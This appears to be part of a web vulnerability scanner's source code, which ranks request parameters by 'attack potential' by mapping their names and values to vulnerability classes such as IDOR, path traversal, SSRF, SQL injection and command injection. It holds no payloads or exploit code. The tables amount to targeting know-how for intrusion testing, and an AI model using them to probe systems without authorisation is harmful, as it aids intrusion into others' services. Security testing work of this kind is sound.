PARAM_SEMANTICS = {
"id_params": {
"names": ["id", "uid", "user_id", "userid", "account_id", "accountid",
"order_id", "orderid", "item_id", "itemid", "product_id",
"productid", "post_id", "comment_id", "doc_id", "resource_id",
"pid", "oid", "cid", "rid"],
"vuln_types": ["idor", "bola", "bfla", "sqli_error", "sqli_blind"],
"risk_score": 0.85,
"test_strategy": "increment_decrement",
},
"file_params": {
"names": ["file", "path", "filepath", "filename", "doc", "document",
"page", "include", "template", "tmpl", "tpl", "view",
"load", "read", "src", "source", "content", "folder",
"directory", "dir", "attachment"],
"vuln_types": ["lfi", "path_traversal", "arbitrary_file_read", "rfi",
"file_upload"],
"risk_score": 0.90,
"test_strategy": "file_traversal",
},
"url_params": {
"names": ["url", "redirect", "redirect_url", "redirect_uri", "next",
"return", "returnto", "return_url", "callback", "goto",
"link", "ref", "referer", "dest", "destination", "target",
"uri", "continue", "forward", "out", "checkout_url"],
"vuln_types": ["ssrf", "open_redirect", "ssrf_cloud"],
"risk_score": 0.85,
"test_strategy": "url_injection",
},
"query_params": {
"names": ["q", "query", "search", "keyword", "keywords", "term",
"filter", "find", "lookup", "s", "text", "input",
"name", "title", "description"],
"vuln_types": ["sqli_error", "sqli_blind", "sqli_union", "nosql_injection",
"xss_reflected", "ssti"],
"risk_score": 0.75,
"test_strategy": "injection",
},
"auth_params": {
"names": ["token", "auth", "auth_token", "access_token", "key",
"api_key", "apikey", "session", "session_id", "sessionid",
"jwt", "bearer", "secret", "password", "passwd", "pwd"],
"vuln_types": ["jwt_manipulation", "auth_bypass", "session_fixation",
"broken_authentication"],
"risk_score": 0.80,
"test_strategy": "auth_manipulation",
},
"code_params": {
"names": ["cmd", "exec", "command", "code", "eval", "expression",
"run", "shell", "execute", "ping", "ip", "host",
"hostname", "domain"],
"vuln_types": ["command_injection", "ssti", "rce",
"expression_language_injection"],
"risk_score": 0.95,
"test_strategy": "code_execution",
},
"format_params": {
"names": ["format", "type", "content_type", "output", "ext",
"mime", "render", "engine", "processor"],
"vuln_types": ["ssti", "xxe", "insecure_deserialization"],
"risk_score": 0.70,
"test_strategy": "format_manipulation",
},
"sort_params": {
"names": ["sort", "sortby", "sort_by", "order", "orderby",
"order_by", "column", "col", "field", "group",
"groupby", "group_by", "limit", "offset"],
"vuln_types": ["sqli_error", "sqli_blind"],
"risk_score": 0.65,
"test_strategy": "sql_injection",
},
}
# Value patterns that indicate specific vulnerability types
VALUE_PATTERNS = {
r"^\d+$": {"category": "numeric_id", "vulns": ["idor", "bola", "sqli_error"]},
r"^[a-f0-9\-]{32,}$": {"category": "uuid", "vulns": ["idor"]},
r"^https?://": {"category": "url_value", "vulns": ["ssrf", "open_redirect"]},
r"[/\\]": {"category": "path_value", "vulns": ["lfi", "path_traversal"]},
r"\.(?:php|asp|jsp|html|xml|json)$": {"category": "file_ext", "vulns": ["lfi", "rfi"]},
r"^eyJ": {"category": "jwt_token", "vulns": ["jwt_manipulation"]},
r"<[^>]+>": {"category": "html_value", "vulns": ["xss_reflected", "xss_stored"]},
r"(?:SELECT|INSERT|UPDATE|DELETE)\s": {"category": "sql_fragment", "vulns": ["sqli_error"]},
}
def classify_parameter(self, name: str, value: str = "") -> ParamProfile:
"""Classify a parameter by name + value analysis."""
name_lower = name.lower().strip()
# Check name-based semantics
for category, config in self.PARAM_SEMANTICS.items():
if name_lower in config["names"]:
return ParamProfile(
name=name,
category=category.replace("_params", ""),
risk_score=config["risk_score"],
priority_vulns=list(config["vuln_types"]),
test_strategy=config["test_strategy"],
)
# Check partial name matches
for category, config in self.PARAM_SEMANTICS.items():
for pattern_name in config["names"]:
if pattern_name in name_lower or name_lower in pattern_name:
return ParamProfile(
name=name,
category=category.replace("_params", ""),
risk_score=config["risk_score"] * 0.8, # Lower confidence for partial match
priority_vulns=list(config["vuln_types"]),
test_strategy=config["test_strategy"],
)
# Check value-based patterns
if value:
for pattern, info in self.VALUE_PATTERNS.items():
if re.search(pattern, value, re.IGNORECASE):
return ParamProfile(
name=name,
category=info["category"],
risk_score=0.65,
priority_vulns=list(info["vulns"]), # Copy so callers cannot mutate VALUE_PATTERNS
test_strategy="value_based",
value_hint=info["category"],
)
# Generic parameter — still testable
return ParamProfile(
name=name,
category="generic",
risk_score=0.40,
priority_vulns=["xss_reflected", "sqli_error"],
test_strategy="default",
)
def rank_parameters(self, params: Dict[str, str]) -> List[Tuple[str, float, List[str]]]:
"""Rank parameters by attack potential.
Args:
params: Dict of param_name -> param_value
Returns:
Sorted list of (name, risk_score, priority_vulns), highest risk first
"""
rankings = []
for name, value in params.items():
profile = self.classify_parameter(name, value if isinstance(value, str) else "")
rankings.append((name, profile.risk_score, profile.priority_vulns))
# Sort by risk score descending
rankings.sort(key=lambda x: x[1], reverse=True)
return rankings
def get_test_strategy(self, param_name: str) -> str:
"""Return recommended test strategy for a parameter."""
profile = self.classify_parameter(param_name)
return profile.test_strategy
def get_vuln_types_for_param(self, param_name: str, param_value: str = "",
max_types: int = 5) -> List[str]:
"""Return vuln types most relevant to this parameter."""
profile = self.classify_parameter(param_name, param_value)
return profile.priority_vulns[:max_types]
def get_high_risk_params(self, params: Dict[str, str],
threshold: float = 0.7) -> List[str]:
"""Return only parameters above the risk threshold."""
rankings = self.rank_parameters(params)
return [name for name, score, _ in rankings if score >= threshold]
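The name-based ranking can be illustrated with a cut-down table. This is a sketch under stated assumptions, not the original classifier: `SEMANTICS` holds only a few of the names from `PARAM_SEMANTICS`, `classify` and `rank` are hypothetical helpers, and the partial match here checks one direction only and skips names of one or two characters, which differs from the original substring test.

```python
from typing import Iterable, List, Tuple

# Reduced copy of the name table; risk values are taken from PARAM_SEMANTICS.
SEMANTICS = {
    "file": {"names": ["file", "path", "template"], "risk": 0.90},
    "url": {"names": ["url", "redirect", "next"], "risk": 0.85},
    "query": {"names": ["q", "search"], "risk": 0.75},
}
GENERIC_RISK = 0.40


def classify(name: str) -> Tuple[str, float]:
    """Return (category, risk_score) for a parameter name."""
    n = name.lower().strip()
    # Pass 1: exact name match at full risk.
    for category, cfg in SEMANTICS.items():
        if n in cfg["names"]:
            return category, cfg["risk"]
    # Pass 2: known name contained in the parameter name, at 80% of the risk.
    for category, cfg in SEMANTICS.items():
        if any(known in n for known in cfg["names"] if len(known) > 2):
            return category, round(cfg["risk"] * 0.8, 2)
    return "generic", GENERIC_RISK


def rank(names: Iterable[str]) -> List[Tuple[str, str, float]]:
    """Sort parameter names by risk score, highest first."""
    scored = [(name, *classify(name)) for name in names]
    return sorted(scored, key=lambda item: item[2], reverse=True)


for name, category, risk in rank(["page_url", "q", "file", "color"]):
    print(f"{name:10} {category:8} {risk:.2f}")
```

Skipping very short names in the partial pass is worth considering for the real table as well: with a plain substring test, an entry such as `s` or `q` matches almost any parameter name.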

Some files were not shown because too many files have changed in this diff